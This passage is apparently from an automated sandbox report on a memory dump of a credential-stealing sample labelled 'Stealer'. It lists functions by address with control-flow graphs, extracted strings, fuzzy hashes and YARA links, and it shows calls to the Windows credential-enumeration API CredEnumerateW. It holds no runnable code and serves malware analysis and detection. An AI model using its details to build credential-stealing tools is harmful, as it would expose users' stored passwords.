                                                                              control_flow_graph 718 7fe93d961b0-7fe93d961ba 719 7fe93d961bc-7fe93d96234 call 7fe93d83508 call 7fe93d83510 call 7fe93d83fe0 call 7fe93d840c0 call 7fe93d83518 call 7fe93d83520 718->719 720 7fe93d9614f-7fe93d961a8 718->720 734 7fe93d96239-7fe93d9653c call 7fe93d83fe0 call 7fe93d840c0 call 7fe93d83528 call 7fe93d83530 call 7fe93d83fe0 call 7fe93d840c0 call 7fe93d83538 call 7fe93d83540 call 7fe93d83fe0 call 7fe93d840c0 call 7fe93d83548 call 7fe93d83550 call 7fe93d83fe0 call 7fe93d840c0 call 7fe93d83558 call 7fe93d83560 call 7fe93d83fe0 call 7fe93d840c0 call 7fe93d83568 call 7fe93d83570 call 7fe93d83fe0 call 7fe93d840c0 call 7fe93d83578 call 7fe93d83580 call 7fe93d83fe0 call 7fe93d840c0 call 7fe93d83588 call 7fe93d83590 call 7fe93d83598 call 7fe93d83fe0 call 7fe93d840c0 call 7fe93d835a0 719->734 806 7fe93d9653e-7fe93d96552 734->806 807 7fe93d96555-7fe93d965d0 734->807 806->807 809 7fe93d965e9-7fe93d96653 807->809 810 7fe93d965d2-7fe93d965e6 807->810 811 7fe93d9666c-7fe93d9667a 809->811 812 7fe93d96655-7fe93d96669 809->812 810->809 813 7fe93d96680-7fe93d966ee 811->813 814 7fe93d96b01-7fe93d96b11 811->814 812->811 820 7fe93d96707-7fe93d9674a 813->820 821 7fe93d966f0-7fe93d96704 813->821 817 7fe93d96b14-7fe93d96b2a 814->817 818 7fe93d96b13 814->818 818->817 822 7fe93d9674c-7fe93d96760 820->822 823 7fe93d96763-7fe93d967a6 820->823 821->820 822->823 824 7fe93d967a8-7fe93d967bc 823->824 825 7fe93d967bf-7fe93d96835 823->825 824->825 827 7fe93d96837-7fe93d96851 825->827 828 7fe93d96854-7fe93d968c8 825->828 827->828 830 7fe93d968e7-7fe93d96952 828->830 831 7fe93d968ca-7fe93d968e4 828->831 833 7fe93d9696a-7fe93d96a47 call 7fe93d835a8 call 7fe93d835b0 call 7fe93d83fe0 call 7fe93d840c0 830->833 834 7fe93d96954-7fe93d96967 830->834 831->830 845 7fe93d96a49-7fe93d96a5c 833->845 846 7fe93d96a5f-7fe93d96b00 call 7fe93d835b8 call 7fe93d835c0 call 7fe93d83fe0 call 7fe93d840c0 833->846 834->833 845->846
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Ktx$S1z&$cQU,$hVU?
                                                                              • API String ID: 0-1265154631
                                                                              • Opcode ID: 74ce24f9316972193f09d219ee00640ad062eefee4890adfed4862c9ab2985d1
                                                                              • Instruction ID: 345e07bf182315c46ad3d3168ebc7535de95f3ef83e7dab651a483f7ccd4c820
                                                                              • Opcode Fuzzy Hash: 74ce24f9316972193f09d219ee00640ad062eefee4890adfed4862c9ab2985d1
                                                                              • Instruction Fuzzy Hash: 43524C70E1561D8FEB94DBA8C8957EDB7B1FF98300F1041E9D00DE77A6DA34A9818B41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93DB2C2D Relevance: 4.3, Strings: 3, Instructions: 598COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 858 7fe93db2c2d-7fe93db2c39 859 7fe93db2c3b-7fe93db2c43 858->859 860 7fe93db2c44-7fe93db2c53 858->860 859->860 861 7fe93db2c55-7fe93db2c5d 860->861 862 7fe93db2c5e-7fe93db2ccb 860->862 861->862 863 7fe93db2ccd-7fe93db2ce1 862->863 864 7fe93db2ce4-7fe93db2d40 862->864 863->864 866 7fe93db2d58 call 7fe93d80e70 864->866 867 7fe93db2d42-7fe93db2d55 864->867 869 7fe93db2d5d-7fe93db2dfd call 7fe93d80e78 call 7fe93d83fe0 call 7fe93d840c0 866->869 867->866 877 7fe93db2e15-7fe93db2ec9 call 7fe93d80e80 call 7fe93d80e88 call 7fe93d83fe0 call 7fe93d840c0 869->877 878 7fe93db2dff-7fe93db2e12 869->878 888 7fe93db2ecb-7fe93db2ede 877->888 889 7fe93db2ee1-7fe93db2f95 call 7fe93d80e90 call 7fe93d80e98 call 7fe93d83fe0 call 7fe93d840c0 877->889 878->877 888->889 899 7fe93db2fad-7fe93db3061 call 7fe93d80ea0 call 7fe93d80ea8 call 7fe93d83fe0 call 7fe93d840c0 889->899 900 7fe93db2f97-7fe93db2faa 889->900 910 7fe93db3079-7fe93db312d call 7fe93d80eb0 call 7fe93d80eb8 call 7fe93d83fe0 call 7fe93d840c0 899->910 911 7fe93db3063-7fe93db3076 899->911 900->899 921 7fe93db3145-7fe93db31f9 call 7fe93d80ec0 call 7fe93d80ec8 call 7fe93d83fe0 call 7fe93d840c0 910->921 922 7fe93db312f-7fe93db3142 910->922 911->910 932 7fe93db31fb-7fe93db320e 921->932 933 7fe93db3211-7fe93db32c5 call 7fe93d80ed0 call 7fe93d80ed8 call 7fe93d83fe0 call 7fe93d840c0 921->933 922->921 932->933 943 7fe93db32dd-7fe93db3391 call 7fe93d80ee0 call 7fe93d80ee8 call 7fe93d83fe0 call 7fe93d840c0 933->943 944 7fe93db32c7-7fe93db32da 933->944 954 7fe93db33a9-7fe93db345d call 7fe93d80ef0 call 7fe93d80ef8 call 7fe93d83fe0 call 7fe93d840c0 943->954 955 7fe93db3393-7fe93db33a6 943->955 944->943 965 7fe93db3475-7fe93db34ed call 7fe93d80f00 call 7fe93d80f08 call 7fe93d83fe0 call 7fe93d840c0 954->965 966 7fe93db345f-7fe93db3472 954->966 955->954 966->965
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: <WU$>2j$I`z
                                                                              • API String ID: 0-1552865806
                                                                              • Opcode ID: 5a76c664daba7cb5147f0c80d7698f1cefe782f0f7710ba04fec98de9b66b3b4
                                                                              • Instruction ID: fe81f09b991d154bb2541c112481a69e0a2c6403f261f2e3188cc89d3480c61c
                                                                              • Opcode Fuzzy Hash: 5a76c664daba7cb5147f0c80d7698f1cefe782f0f7710ba04fec98de9b66b3b4
                                                                              • Instruction Fuzzy Hash: 5A42F871E14A1D8FEB90DBA8C8957DDB7F1FF98300F1441A6900CE77A5EA78A9818F41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93DAE211 Relevance: 3.2, Strings: 2, Instructions: 737COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1012 7fe93dae211-7fe93dae23f 1013 7fe93dae241-7fe93dae24b 1012->1013 1014 7fe93dae254-7fe93dae270 1012->1014 1013->1014 1017 7fe93dae24d-7fe93dae252 1013->1017 1018 7fe93dae273-7fe93dae2fb 1014->1018 1017->1018 1020 7fe93dae2fd-7fe93dae311 1018->1020 1021 7fe93dae314-7fe93dae373 1018->1021 1020->1021 1023 7fe93dae38b call 7fe93d81988 1021->1023 1024 7fe93dae375-7fe93dae388 1021->1024 1026 7fe93dae390-7fe93dae439 call 7fe93d81990 call 7fe93d83fe0 call 7fe93d840c0 1023->1026 1024->1023 1034 7fe93dae43b-7fe93dae44e 1026->1034 1035 7fe93dae451-7fe93dae505 call 7fe93d81998 call 7fe93d819a0 call 7fe93d83fe0 call 7fe93d840c0 1026->1035 1034->1035 1045 7fe93dae507-7fe93dae51a 1035->1045 1046 7fe93dae51d-7fe93dae5d1 call 7fe93d819a8 call 7fe93d819b0 call 7fe93d83fe0 call 7fe93d840c0 1035->1046 1045->1046 1056 7fe93dae5e9-7fe93dae69d call 7fe93d819b8 call 7fe93d819c0 call 7fe93d83fe0 call 7fe93d840c0 1046->1056 1057 7fe93dae5d3-7fe93dae5e6 1046->1057 1067 7fe93dae69f-7fe93dae6b2 1056->1067 1068 7fe93dae6b5-7fe93dae769 call 7fe93d819c8 call 7fe93d819d0 call 7fe93d83fe0 call 7fe93d840c0 1056->1068 1057->1056 1067->1068 1078 7fe93dae76b-7fe93dae77e 1068->1078 1079 7fe93dae781-7fe93dae835 call 7fe93d819d8 call 7fe93d819e0 call 7fe93d83fe0 call 7fe93d840c0 1068->1079 1078->1079 1089 7fe93dae837-7fe93dae84a 1079->1089 1090 7fe93dae84d-7fe93dae901 call 7fe93d819e8 call 7fe93d819f0 call 7fe93d83fe0 call 7fe93d840c0 1079->1090 1089->1090 1100 7fe93dae919-7fe93dae9cd call 7fe93d819f8 call 7fe93d81a00 call 7fe93d83fe0 call 7fe93d840c0 1090->1100 1101 7fe93dae903-7fe93dae916 1090->1101 1111 7fe93dae9cf-7fe93dae9e2 1100->1111 1112 7fe93dae9e5-7fe93daea99 call 7fe93d81a08 call 7fe93d81a10 call 7fe93d83fe0 call 7fe93d840c0 1100->1112 1101->1100 1111->1112 1122 7fe93daea9b-7fe93daeaae 1112->1122 1123 7fe93daeab1-7fe93daeb65 call 7fe93d81a18 call 7fe93d81a20 call 7fe93d83fe0 call 7fe93d840c0 1112->1123 1122->1123 1133 7fe93daeb67-7fe93daeb7a 1123->1133 1134 7fe93daeb7d-7fe93daec31 call 7fe93d81a28 call 7fe93d81a30 call 7fe93d83fe0 call 7fe93d840c0 1123->1134 1133->1134 1144 7fe93daec49-7fe93daecc1 call 7fe93d81a38 call 7fe93d81a40 call 7fe93d83fe0 call 7fe93d840c0 1134->1144 1145 7fe93daec33-7fe93daec46 1134->1145 1145->1144
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "/?$v:6
                                                                              • API String ID: 0-1173726457
                                                                              • Opcode ID: 998356abb946a13669ccb78e83992358bf0ef3be82e917853ae4e27f4998d613
                                                                              • Instruction ID: c58b5a8047d1cc06948fb193553428bf90ed6a7bf30544acbeb0aee2b7f4cd01
                                                                              • Opcode Fuzzy Hash: 998356abb946a13669ccb78e83992358bf0ef3be82e917853ae4e27f4998d613
                                                                              • Instruction Fuzzy Hash: 2762E8B1E1461D8FEB90EBA8C8957DDB7F5FB98300F1441A5900CE77A5EB34AA818F41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93D940D5 Relevance: 2.1, Strings: 1, Instructions: 840COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2266 7fe93d940d5-7fe93d940db 2267 7fe93d940e6-7fe93d940f7 2266->2267 2268 7fe93d940dd-7fe93d940e5 2266->2268 2269 7fe93d940f9-7fe93d94101 2267->2269 2270 7fe93d94102-7fe93d94113 2267->2270 2268->2267 2269->2270 2271 7fe93d9411e-7fe93d9412f 2270->2271 2272 7fe93d94115-7fe93d9411d 2270->2272 2273 7fe93d9413a-7fe93d9414b 2271->2273 2274 7fe93d94131-7fe93d94139 2271->2274 2272->2271 2275 7fe93d94156-7fe93d94167 2273->2275 2276 7fe93d9414d-7fe93d94155 2273->2276 2274->2273 2277 7fe93d94169-7fe93d94171 2275->2277 2278 7fe93d94172-7fe93d9417e 2275->2278 2276->2275 2277->2278 2279 7fe93d9417f-7fe93d94183 2278->2279 2280 7fe93d9418e-7fe93d9419f 2279->2280 2281 7fe93d94185-7fe93d9418d 2279->2281 2282 7fe93d941aa-7fe93d941bb 2280->2282 2283 7fe93d941a1-7fe93d941a9 2280->2283 2281->2280 2284 7fe93d941c6-7fe93d941d7 2282->2284 2285 7fe93d941bd-7fe93d941c5 2282->2285 2283->2282 2286 7fe93d941d9-7fe93d941e1 2284->2286 2287 7fe93d941e2-7fe93d941ea 2284->2287 2285->2284 2286->2287 2287->2279 2288 7fe93d941ec-7fe93d94202 2287->2288 2289 7fe93d9421a-7fe93d94232 2288->2289 2290 7fe93d94204-7fe93d94207 2288->2290 2297 7fe93d94238-7fe93d94270 call 7fe93d86cc0 2289->2297 2298 7fe93d94447-7fe93d94453 2289->2298 2291 7fe93d9420d-7fe93d94219 2290->2291 2292 7fe93d94422 2290->2292 2293 7fe93d94429-7fe93d9443b 2292->2293 2295 7fe93d94276-7fe93d94280 2293->2295 2296 7fe93d94441-7fe93d94444 2293->2296 2300 7fe93d94286-7fe93d9430c 2295->2300 2301 7fe93d94454-7fe93d94469 2295->2301 2296->2298 2297->2295 2297->2296 2333 7fe93d9430e-7fe93d94310 2300->2333 2334 7fe93d94312-7fe93d94322 2300->2334 2305 7fe93d9446d-7fe93d944a9 2301->2305 2306 7fe93d9446b 2301->2306 2308 7fe93d944ad-7fe93d944e7 2305->2308 2306->2305 2306->2308 2310 7fe93d944e9-7fe93d944fd 2308->2310 2311 7fe93d94500-7fe93d94564 2308->2311 2310->2311 2315 7fe93d94566-7fe93d94579 2311->2315 2316 7fe93d9457c-7fe93d94629 call 7fe93d833c0 call 7fe93d833c8 call 7fe93d83fe0 call 7fe93d840c0 2311->2316 2315->2316 2331 7fe93d9462b-7fe93d9463e 2316->2331 2332 7fe93d94641-7fe93d94700 call 7fe93d833d0 call 7fe93d833d8 call 7fe93d83fe0 call 7fe93d840c0 2316->2332 2331->2332 2354 7fe93d94718-7fe93d947e1 call 7fe93d833e0 call 7fe93d833e8 call 7fe93d83fe0 call 7fe93d840c0 call 7fe93d92b00 2332->2354 2355 7fe93d94702-7fe93d94715 2332->2355 2336 7fe93d94324-7fe93d94344 2333->2336 2334->2336 2345 7fe93d94346-7fe93d94348 2336->2345 2346 7fe93d9434a-7fe93d9435a 2336->2346 2348 7fe93d9435c-7fe93d9436c 2345->2348 2346->2348 2348->2293 2353 7fe93d94372-7fe93d9437e 2348->2353 2353->2293 2356 7fe93d94384-7fe93d94387 2353->2356 2379 7fe93d947fa-7fe93d94873 2354->2379 2380 7fe93d947e3-7fe93d947f7 2354->2380 2355->2354 2356->2293 2357 7fe93d9438d-7fe93d94399 2356->2357 2357->2293 2359 7fe93d9439f-7fe93d94421 call 7fe93d903d0 * 2 2357->2359 2383 7fe93d9488b-7fe93d9494d call 7fe93d833f0 call 7fe93d833f8 call 7fe93d83fe0 call 7fe93d840c0 2379->2383 2384 7fe93d94875-7fe93d94888 2379->2384 2380->2379 2394 7fe93d9494f-7fe93d94962 2383->2394 2395 7fe93d94965-7fe93d94a27 call 7fe93d83400 call 7fe93d83408 call 7fe93d83fe0 call 7fe93d840c0 2383->2395 2384->2383 2394->2395 2405 7fe93d94a29-7fe93d94a3c 2395->2405 2406 7fe93d94a3f-7fe93d94a4b call 7fe93d83410 call 7fe93d83418 2395->2406 2405->2406 2410 7fe93d94a50-7fe93d94ac6 call 7fe93d83fe0 call 7fe93d840c0 call 7fe93d92b00 2406->2410
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: J}*_
                                                                              • API String ID: 0-494607371
                                                                              • Opcode ID: a33808c684c30a892028d9c9e3521570743ea7caaddb40e365fa2305273c8734
                                                                              • Instruction ID: be94749f22893454021d9e23c511fb7552e82ac7cab4f868eddda1ae2db6122e
                                                                              • Opcode Fuzzy Hash: a33808c684c30a892028d9c9e3521570743ea7caaddb40e365fa2305273c8734
                                                                              • Instruction Fuzzy Hash: F262E430E09A498FEB95DB78C8557E9BBF1FF59300F1441EAD00DD72A2DA78A881CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93D856F1 Relevance: 1.7, Strings: 1, Instructions: 448COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2419 7fe93d856f1-7fe93d856fd 2420 7fe93d856ff 2419->2420 2421 7fe93d85700-7fe93d85711 2419->2421 2420->2421 2422 7fe93d85713 2421->2422 2423 7fe93d85714-7fe93d85725 2421->2423 2422->2423 2424 7fe93d85727 2423->2424 2425 7fe93d85728-7fe93d857aa 2423->2425 2424->2425 2426 7fe93d857ac-7fe93d857c0 2425->2426 2427 7fe93d857c3 2425->2427 2426->2427 2428 7fe93d857cb-7fe93d85819 2427->2428 2430 7fe93d8581b-7fe93d8582f 2428->2430 2431 7fe93d85832-7fe93d85887 2428->2431 2430->2431 2434 7fe93d85889-7fe93d8589d 2431->2434 2435 7fe93d858a0-7fe93d858a6 2431->2435 2434->2435 2436 7fe93d85be9-7fe93d85bf7 2435->2436 2437 7fe93d858ab-7fe93d858e7 2436->2437 2438 7fe93d85bfd-7fe93d85c03 2436->2438 2439 7fe93d858e9-7fe93d858fd 2437->2439 2440 7fe93d85900-7fe93d85906 2437->2440 2439->2440 2441 7fe93d85af6-7fe93d85b34 2440->2441 2442 7fe93d85b36-7fe93d85b4a 2441->2442 2443 7fe93d85b4d-7fe93d85b53 2441->2443 2442->2443 2444 7fe93d85b59-7fe93d85b68 2443->2444 2445 7fe93d8590b-7fe93d85949 2443->2445 2448 7fe93d85b6e-7fe93d85bbc 2444->2448 2449 7fe93d85c04-7fe93d85cac 2444->2449 2446 7fe93d8594b-7fe93d8595f 2445->2446 2447 7fe93d85962-7fe93d8596a 2445->2447 2446->2447 2450 7fe93d85970-7fe93d859af 2447->2450 2451 7fe93d85a35-7fe93d85a73 2447->2451 2452 7fe93d85bda-7fe93d85be6 2448->2452 2453 7fe93d85bbe-7fe93d85bd4 2448->2453 2470 7fe93d85cb6-7fe93d85ce3 2449->2470 2471 7fe93d85cae-7fe93d85caf 2449->2471 2454 7fe93d859c8-7fe93d85a0c 2450->2454 2455 7fe93d859b1-7fe93d859c5 2450->2455 2456 7fe93d85a8c-7fe93d85a94 2451->2456 2457 7fe93d85a75-7fe93d85a89 2451->2457 2452->2436 2453->2452 2459 7fe93d85a0e-7fe93d85a22 2454->2459 2460 7fe93d85a25-7fe93d85a33 2454->2460 2455->2454 2461 7fe93d85a97-7fe93d85ad5 2456->2461 2457->2456 2459->2460 2460->2461 2463 7fe93d85ad7-7fe93d85aea 2461->2463 2464 7fe93d85aed-7fe93d85af3 2461->2464 2463->2464 2464->2441 2471->2470
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HY{
                                                                              • API String ID: 0-2631839145
                                                                              • Opcode ID: 2076b2891475f5e7dc572083ce67596590c7a4701e5683a9bb7740a7fc84eb68
                                                                              • Instruction ID: 904240919557f9eb5e3d554fde9da162819b42168c123a5e9b6efbf1313af51a
                                                                              • Opcode Fuzzy Hash: 2076b2891475f5e7dc572083ce67596590c7a4701e5683a9bb7740a7fc84eb68
                                                                              • Instruction Fuzzy Hash: F102A8B1E086498FDB49CBA8D8606FD7BF2EF95304F14417EE10AEB395E6386841CB05
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93D88568 Relevance: .8, Instructions: 753COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 76d1ee022d8d7fbd7037480d04467687bd48bb3fe74cfb853d9fcdf97a012828
                                                                              • Instruction ID: 3ee69a6ba9f903cfacd4b88aadab84c4d429681bab9452b70a6652bbe4924b7a
                                                                              • Opcode Fuzzy Hash: 76d1ee022d8d7fbd7037480d04467687bd48bb3fe74cfb853d9fcdf97a012828
                                                                              • Instruction Fuzzy Hash: C6325330A18A054FDB48EB68D495B76B7F2FBD8301B1046BDD40DD76A6DA74F9808782
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93DA4794 Relevance: .7, Instructions: 743COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a05f6a268f057e1ef55cf4049b409ca650fa126bbd2cdb2c49a246bfd8791f10
                                                                              • Instruction ID: 3bc134ca1259b9e3144845cfa67bf002e68be0e67dfb0d95d7f3148769be5297
                                                                              • Opcode Fuzzy Hash: a05f6a268f057e1ef55cf4049b409ca650fa126bbd2cdb2c49a246bfd8791f10
                                                                              • Instruction Fuzzy Hash: 4D321D30A1CA494FEB89EB6884557BA37E6FB89300F2401A9E40DC73E7DA74FC529751
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93DA3BF5 Relevance: .7, Instructions: 671COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0b9c017275173324c1ea9f17d9998bb23d23126cdef4e1a58b0cc77696505556
                                                                              • Instruction ID: f93273b479d9dd10613d30d06185cd4eef79fa882b7311139fe9d1a260f640a0
                                                                              • Opcode Fuzzy Hash: 0b9c017275173324c1ea9f17d9998bb23d23126cdef4e1a58b0cc77696505556
                                                                              • Instruction Fuzzy Hash: 0C229230618A4A8FDB85EF28C494BB677E6FF98300F5044A9E40DC72A6DA35FC52DB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93DB0DAA Relevance: .6, Instructions: 646COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cfd541eb81af49db54e6477272fc6c636d9a26c86d107e69710b3107ec85a672
                                                                              • Instruction ID: b8bf7c002539e2a30e3d70343023b0d8eaa9f3009b79f81a556df5db3e58e2da
                                                                              • Opcode Fuzzy Hash: cfd541eb81af49db54e6477272fc6c636d9a26c86d107e69710b3107ec85a672
                                                                              • Instruction Fuzzy Hash: 89123430B189194FEB88EB6CD465BB973E2FB98300F5045A9900DD73A6DE78FC819791
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93D876F0 Relevance: .6, Instructions: 585COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 02b4832d724ba47af948796aafd4d9adb14bb1e093904034ae60b04ef2f03698
                                                                              • Instruction ID: d8005018574abbe1eaae685ef77abe70837c9c7a0bd1e978498e3c8749eadfc6
                                                                              • Opcode Fuzzy Hash: 02b4832d724ba47af948796aafd4d9adb14bb1e093904034ae60b04ef2f03698
                                                                              • Instruction Fuzzy Hash: 5802F630A1C64A4FF799EBA894A53B973D6FBC4310F24117DD44FC35E2DE68B8426292
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93D8D7B2 Relevance: .5, Instructions: 480COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fee34fb8e3c01d27fd16e34e49486635cf1252413b1dcd3dfb0f113fda445eaf
                                                                              • Instruction ID: f28ec6805c03a4cf0e7ad99b4595e7fdadcca497e7b15f0019611c7abacc0466
                                                                              • Opcode Fuzzy Hash: fee34fb8e3c01d27fd16e34e49486635cf1252413b1dcd3dfb0f113fda445eaf
                                                                              • Instruction Fuzzy Hash: E7E1C530908A4E8FEBA8DF28D8557F977E1FB94310F14426ED84DC76A5DB78B8418782
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93D8CA06 Relevance: .5, Instructions: 478COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ef2ee46337bd2081d400ab8aae0283f726e07360c9af2774656d8737ac9288cb
                                                                              • Instruction ID: 3703f4c5533f222ba49e9558c2751e64a1a1a788581a582134ec110c493a4a38
                                                                              • Opcode Fuzzy Hash: ef2ee46337bd2081d400ab8aae0283f726e07360c9af2774656d8737ac9288cb
                                                                              • Instruction Fuzzy Hash: C9F1B630918A8D8FEBA9DF28C8557F977D1FB94301F14426ED84EC76A1DB74B8418B82
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93D90CB1 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2474 7fe93d90cb1-7fe93d90cb9 2475 7fe93d90cbc-7fe93d90cc9 2474->2475 2476 7fe93d90cbb 2474->2476 2477 7fe93d90ccc-7fe93d90cd9 2475->2477 2478 7fe93d90ccb 2475->2478 2476->2475 2479 7fe93d90cdc-7fe93d90ce9 2477->2479 2480 7fe93d90cdb 2477->2480 2478->2477 2481 7fe93d90cec-7fe93d90d77 2479->2481 2482 7fe93d90ceb 2479->2482 2480->2479 2486 7fe93d90d79-7fe93d90d7e 2481->2486 2487 7fe93d90d81-7fe93d90dc6 CredEnumerateW 2481->2487 2482->2481 2486->2487 2488 7fe93d90dc8 2487->2488 2489 7fe93d90dce-7fe93d90e00 2487->2489 2488->2489
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID: CredEnumerate
                                                                              • String ID:
                                                                              • API String ID: 3404281133-0
                                                                              • Opcode ID: 8f68aa833cbc1f773568fe018be67de68f9f28fa24eab26d99fdb11ba35939a5
                                                                              • Instruction ID: 933acd3f62eafa500f6eef2f0efb04d1426c2f9a81bc5293a7d4b949bd1a51b8
                                                                              • Opcode Fuzzy Hash: 8f68aa833cbc1f773568fe018be67de68f9f28fa24eab26d99fdb11ba35939a5
                                                                              • Instruction Fuzzy Hash: 39419D3180DA584FD718DB68AC066FA7BF4EB55321F04426FE04DD35A2CA787946C7D2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000007FE93D8AAD0 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2491 7fe93d8aad0-7fe93d90d77 2495 7fe93d90d79-7fe93d90d7e 2491->2495 2496 7fe93d90d81-7fe93d90dc6 CredEnumerateW 2491->2496 2495->2496 2497 7fe93d90dc8 2496->2497 2498 7fe93d90dce-7fe93d90e00 2496->2498 2497->2498
                                                                              APIs
                                                                              Memory Dump Source
